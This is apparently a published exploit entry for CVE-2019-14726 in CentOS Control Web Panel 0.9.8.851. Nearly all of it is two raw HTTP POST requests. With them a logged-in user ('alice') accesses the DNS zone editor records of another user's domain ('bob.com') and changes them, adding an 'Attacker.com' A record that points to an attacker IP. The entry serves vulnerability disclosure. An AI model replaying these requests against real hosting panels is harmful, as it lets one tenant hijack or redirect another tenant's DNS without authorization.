Exploit Title       : CWP (CentOS Control Web Panel) Access And DNS Record
Date                : 24 Jul 2019
Exploit Author      : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage     : https://control-webpanel.com/
Software Link       : Not available, user panel only available for latest version
Version             : 0.9.8.851
Tested on           : CentOS 7.6.1810 (Core), Firefox 68.0.1 (64-bit)
CVE-Number          : CVE-2019-14726
Reference           : N/A

Access

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=dns_zone_editor&acc=paserrecord HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 16
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=dns_zone_editor
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com

Delete

POST /cwp_b99b38b4d4ced310/alice/alice/index.php?module=dns_zone_editor&acc=addregdns HTTP/1.1
Host: 192.168.80.148:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430
X-Requested-With: XMLHttpRequest
Content-Length: 111
Connection: close
Referer: https://192.168.80.148:2083/cwp_b99b38b4d4ced310/alice/?module=dns_zone_editor
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2

domain=bob.com&namereg=Attacker.com&valuereg=192.168.10.200&cachereg=14400&reg=A&flag=undefined&tag=undefined